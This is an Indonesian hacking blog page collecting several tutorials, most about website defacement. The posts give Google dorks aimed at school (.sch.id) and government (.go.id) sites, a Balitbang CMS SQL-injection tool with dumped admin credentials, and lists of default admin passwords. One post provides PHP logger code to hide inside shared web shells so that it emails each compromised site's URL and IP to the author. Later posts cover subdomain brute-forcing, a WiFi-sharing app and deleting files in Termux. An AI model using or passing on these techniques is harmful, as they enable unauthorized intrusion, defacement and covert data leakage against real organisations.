Deface Web Sekolah Cms Balitbang HashPass

Cara Deface Balitbang Cms 

Website Sekolah Gratis

Malem kawan.. malem ini gw mau share cara deface web sekolah menggunakan metode Balitbang.. kalian yg punya dendam, benci atau apalah ke sekolah kalian mngkin bisa bisa pke cara ini:V".. balitbang sendiri ada bnyk ada yg register 3.5.3.. tpi kalaw gw sih pke tools punya nya master gw afrizal:V".. lngsng aja tutorialnya :

1. Termux (download diplaystore)

2. Sc&Shell Backdoor

3. Dork : 

>intext:"Setup by Website Sekolah Gratis." Ulangan Site:sch.id

>intext:"Setup by cmssekolahku." cbt site:sch.id

>intext:"Setup by Website Sekolah Gratis." rudi site:sch.id

>intext:"Setup by Website Sekolah Gratis." guru bahasa site:sch.id

>intext:"Setup by Website Sekolah Gratis." firman site:sch.id

>intext:"Setup by Website Sekolah Gratis." kenaikan kelas Site:sch.id
(Kembangin ea biar dpet bnyk)

4. Toolsnya :
https://github.com/Afrizall/balitbang-sqli-post-data/blob/master/balitbang.php

5. Exploit ; http://web.nya/path/listmemberall.php

Langkah awal dorking digoogle kek biasanyaa .. Btw gw sih suka deface web pemerintah ketimbang web sekolah:V"..

Pilih salah satu target web sekolah yg mau dideface.. kemudian masukan exploitnya /listmemberall.php kalaw vuln blank putih..

Kalaw sudah nemu target buka termux dan install dulu toolsnya.. caranya? 

$git clone https//github.com/Afrizall/balitbang-sqli-post-data/blob/master/balitbang.php 

Kemudian 

$cd balitbang-sqli-post-data

Last
$php balitbang.php targetkalian

[+] Data 1 [+]

[+] Username : admin

[+] Password : 5bg848383c1c6c7c4b3c0

[+] End Data [+]

[+] Data 2 [+]

[+] Username : gafar

[+] Password : 5bg848383b3bbb9c0b3c5

[+] End Data [+]

Lah done kan.. terakhir tingggal kita hash passwordnya yg data1.. hashnya private ea bang.. wa gw aja 083831973261:V"..

Kita coba hash data keduanya..

Hehehehe tinggal admin loginnya.. bisa kalian cari sendiri gk ush manja:B".. silahkan coba pantesting web sekolah kalian masing":v".. tanggung jawab ditanggung pemenang>\\<..

#see you in next post

#tuhan bersama jiwa jiwa yg santuy

Read More

Deface Admin Weak Password 2019

Tutorial Deface CMS Admin

Week Password 2019

Hai kawan..

Kembali lagi dengan gw :V"..  kali ini kita akan belajar Deface menggunakam metode admin week pass.. yahh menurut gw sih ini mah bkn metode tpi orang goblok yg sok sok buat website tpi U&P pasaran:V".. alias gampang ketebak.. caranya sih cukup simpel  sambil merem juga bisa:)' tpi nyari target nya yg agak susah:V".. kan kalaw gk go.id gak nikmat:V".. hehehe ok lngsng tutorialnya : 

~ Shell Bacdoor & Script Deface

~ Dork : 

1. inurl:/admin123/login.php site:.id

2. intitle:login.php site:.go.id

3. inurl:/adminweb/index.php site:.go.id

(Kembangin lagi biar dapet yg fresh)

~ User&Password

user : admin 

password: admin 

user : admin 

password : 123456 

user : admin 

password : admin123

user: administrator

password: administrator

Seperti biasa kita dorking dulu dibrowser kesayangan kita google chrome:V"..

Kemudian kita pilih salah satu target dan login menggunakan u&p yg gw bagiin diatas.. coba aja satu" 

Kalaw sukses kalian akan langsung masuk menuju dashboard adminnya..

Last terserah kalian mau apain tuh web:V".. Saran gw sih mending backup dulu biar ntar kalaw ngindex aman:V".. kalian gk pernah tau mngkn apa yg kalian lakuin skrng bisa aja buat seseorang kehilangan pekerjaan:V".. 

>\\< 

Ok sekian dari gw thanks..

#see you in next post

Read More

Tutorial Membuat Logger Pada ShellBackdoor

Cara Menyisipkan Logger

Dengan Mudah 

Ok kali ini kita akan bljr tentang logger dan shell backdoor.. apasih shell backdoor itu? Shell backdoor adalah file yg digunakan untuk mengontrol semua file file yg ada didalam website.. lalu logger itu apa? Logger adalah proses otomatis pengumpulan dan perekaman data dari sensor untuk tujuan pengarsipan atau tujuan analisis.. singkatnya buat riwayat logging.. Keuntungan memasang Logger di Shell Backdoor adalah kita tidak usah mencari bug pada website, akan tetapi kita tinggal menunggu hasil dari logger yang sudah kita pasang di dalam shell backdoor tersebut.

Misalnya : Gw mempunyai sebuah Shell Backdoor. Gw ubah trs gw tambahin script yang ada di Shell Backdoor tersebut dengan script Logger. Kemudian gw tinggal bagikan kepada teman-teman gw. dan apabila teman gw berhasil mengupload shell tersebut maka otomatis kita akan bisa melihat link yang ditanam melalui email yang sudah kita tulis di script logger tersebut. Mantap bujank:V".. bahannnya dikit :

1. Kita siapkan shell yg akan kita ubah.. kalaw blm punya download digoogle bnyk.. shell indoxploit.. alfashell.. C99 shell dll.. atau bisa chmod disini 

2. Siapkan Script Logger .. 

Seperti ini script nya :

<?php @ini_set('output_buffering', 0); @ini_set('display_errors', 0); set_time_limit(0); ini_set('memory_limit', '64M'); header('Content-Type: text/html; charset=UTF-8'); $tujuanmail = 'emailkalian@gmail.com'; $x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI']; $pesan_alert = "fix $x_path :p *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]"; mail($tujuanmail, "LOGGER", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]"); ?>

Nb: emailkalian@gmail.com 

Ubah dengan email kalian masing"

Terus bagaimana cara pasangnya? 

Pertama buka shell kalian ditext editor kalian masing".. 

Kemudian copy dan paste script loggernya dibawahnya tulisan "@ini_set('max_execution_time',0);"

Last kalian simpan kemudian share ke teman" agar shellnya ramai digunakan:B".. 

Cara cek kalaw shellnya dipake atau sukses adalah kalian buka gmail kalian.. trs cari bagian spam.. pasti ada pesan loggernya disitu.. tinggal liat aja deh akses shellnya >\\<

Hehehehehhe mayan gk perlu dorking.. tinggal tunggu hasil aja:V".. okok cukup segini aja dari gw.. moga bermanfaat

#Sesungguhnya tuhan bersama orang-orang yg santuy

Read More

Tutorial CreateSubdoFinder (Buatan Sendiri)

Cara Membuat Tools Python

Create Subdofinder

Welcome Back.. Kali ini gw mau kasih tutorial gimana sih caranya bikin tools sendiri yg fungsi tools tersebut adalah untuk menemukan subdomain:V".. heheheh.. masa dari dulu lu suka jadi script kiddie yg bisanya cmn pke tools orang anjer:V".. kgk kan?.. aowkqoqkwowwowkok..  okok langsung aja ke tutorialnya.. disini gw pake bahasa pemrograman python.. knp hrus python? Soalnya module/library python tuh bnyk.. ditambh mudah dipelajari.. dan yg pling gw suka kgk tergantung ama semicolon :V: xdxd.. Disini gw pke python versi 2.7 ya.. lu lu semua yg pro yg udh pke versi 3 menyesuaikan sendiri ea codingannya:V*.... 

Kalian bisa gunakan teks editor kalian masing".. gk ush manja.. download diplaystore bnyk..

- Start Coding

Untuk bagian atas kita ketikkan dulu module/library yg akan kita gunakan.. yaitu requests ..  Contoh :

Import Requests

- Selanjutnya membuat fungsi/method baru.. bebas kalian kasih nama method.. gw pke nama rikues.. lalu wajib diawali dengan syntax def..  seperti ini :

def rikues(url):

- Kemudian masukan syntax berikut kedalam fungsi rikuesnya.. seperti ini :

try: return requests.get("http://"+url) except requests.exceptions.ConnectionError: pass 

- Selanjutnya kita tambahkan variabel string yang berisikan target yg akan kita scan.. contohnya disini gw pke mi.com .. simpan diluar rikuesnya.. seperti ini :

target_url="mi.com" 

- Next kalian buat wordlistnya dulu.. atau bisa copas di Sini

- Setelah Kalian Buat Wordlistnya saatnya memasukan syntax bruteforce seperti ini :

with open("lokasiwordlistmu","r") as wordlist_file: for line in wordlist_file: word=line.strip() test_url=word+"."+target_url response = requests(test_url) if response: print("Subdomain Ditemukan")

- Last Kalaw Digabung Seperti Ini Codingannya :

import requests def rikues(url): try: return requests.get("http://"+url) except requests.exceptions.ConnectionError: pass target_url="mi.com" with open("lokasiwordlistmu", "r") as wordlist_file: for line in wordlist_file: word=line.strip() test_url=word+"."+target_url response = rikues(test_url) if response: print("Subdomain Ditemukan >> "+test_url)

Lalu kalian simpan dengan format .py.. contoh : falkapink.py.. kemudian coba kalian run kan diterminal.. pasti hasil dari subdomain akan keluar.. udh segitu aja dari gw thanks for reading.. kalaw mau gw dah ada github nya ..

https://github.com/falkagans/CreateSubdoFinder

#Minal adzin wal faidzin 

#Happy Hacking Deface Page

Read More

Cara Menggunakan WIFI Key Master

Ini Cara Kerja Wifi Master Key 

Bukan Untuk Bobol Wifi Android

Sudah tahukah lu semua fungsi utama dari wifi master key? kalaw belum skuy gw jelasin,, 

jdi gini banyak yg menganggap aplikasi wifi master adalah aplikasi untuk membobol wifi gan,, pdhl enggk sama sekali,, gw juga kmrin liat blog yg menulis artikel tentang hack wifi menggunakan wifi key master no root,, heheeheh sumpah tuh blog gk guna ampas :v,, jdi gini fungsi utama wifi master key adalah untuk berbagi kata sandi wifi,, bukan untuk bobol/mengetahui password wifi,, 

Contoh sederhananya kek gini : misalnya si A lagi berada di coffee shop mall,karena di coffee shop tersedia wifi gratis ,si A pun meminta password/kata wifi tersebut ke pelayan coffee shop tersebut. setelah mendapat kata sandi atau password wifi di coffee shop tersebut, si A ingin membagikan password dan wifi tersebut ke seluruh pengguna, maka si A bisa dengan mudah membagikan password dan nama jaringan wifi tersebut via aplikasi wifi master key android.

beberapa hari kemudian si B juga ke coffee shop yang sama di mall, karena si B melihat ada jaringan wifi tapi ada password.. kemudian Si B menggunakan aplikasi wifi master key. karena si A di awal sudah membagikan wifi berada di coffee shop tersebut, maka si B dengan mudah menghubungkan wifi tersebut tanpa harus bertanya ke pelayan disana. apakah selama nya si B dan semua orang bisa menggunakan wifi share coffe shop dari si A ?.yup bisa selama password atau kata sandi tidak di rubah oleh si pemilik coffe shop. intinya fungsi dari aplikasi wifi master key adalah untuk berbagi password wifi secara umum.HANYA TITIK WIFI YANG SUDAH DI BAGIKAN YANG BISA DI KONEKSI, menggunakan wifi master key ini, selama wifi tidak di bagi untuk umum, maka lu gk akan bisa menggunakan jaringan wifi yang tersedia tersebut. jadi tidak usah heran apabila sejenis aplikasi wifi share itu hanya menampilkan wifi di titik atau daerah tertentu saja. Meski ada jaringan wifi terdekat dari tempat lu,, 

Cara penggunaan nya kek gini,, 

!. Download dulu aplikasinya di playstore

2. Setelah download buka aplikasinya dan liat wifi yg dibagikan sandinya ,, yg atas ada 2 jaringan tuh udah dibagikan :V"..

3. Klik sambungkan ke wifi yg lu inginkan,,  

4. lah done dah tersambung tanpa mengetahui passwordnya,, skrng tinggal kita test aja bisa enggk,, 

hehehheeh lancar gays,, Mayan lah gk perlu nanya" passwordnya.. okok silahkan lu download dan coba aplikasinya..

NB: biasanya dimall lanjay:V"..

#Selamat Hari Raya Idul Fitri 1440H..

#Kami Keluarga Besar W3LL SQUAD Mengucapkan Minal Adzin Wal Faidzin.. 

Read More

Tips&Trik Menghapus Instalan Ditermux

Cara Menghapus File 

Folder & Tools Ditermux

Minal aidzin wal faidzin gan..

Mohon maap lahir batin.. berhubung bsok dah lebaran sekalian gw mau minta maaf kalaw gw ada salah ama lu semua.. maapin gw ya:(.. namanya juga manusia tak luput dari dosa:V".. hehehe:V".. Pada kesempatan kali ini gw mau kasih tutorial seputar termux gan.. cara menghapus file" folder lewat termux dan juga instalan tools yg sudah terpasang.. caranya bagaimana?? Simak aja lngsng.. 

1. Menghapus Installan Tools Ditermux

Menggunakan perintah

- $ pkg install mc

- $ mc

Tinggal pilih installan apa yg ingin kalian hapus.. trs teken "delete" lalu "yes"..

2. Menghapus file pada termux

- Menggunakan perintah "rm" 

rm merupakan perintah untuk menghapus file pada filesystem. Seperti menghapus file pada sistem operasi Linux,

$ rm {nama file} 

$ rm [options] {nama file}

$ unlink {nama file}

$ rm -f -r {nama file}

Keterangan :

-f (force) yaitu menghapus tanpa konfirmasi 

-r(recursive) atau biasanya dengan -R yaitu menghapus file dengan cara recursive

Contoh penggunaannya :

rm abc.txt 

rm -rf falkapink

3. Menghapus Direktori / Folder

menggunakan kode Peritah rmdir {nama folder}..

perintah rmdir digunakan untuk menghapus file yang kosong dan tidak bisa digunakan untuk menghapus direktori / folder yang ada file di dalamnya.

Contoh penggunaannya : 

$ rm -rf [nama folder]

$ rm -rm falkapink

Sekian dari gw .. terima kasih.. 

See you in next post

#selamat hari raya idul fitri 1440H

Read More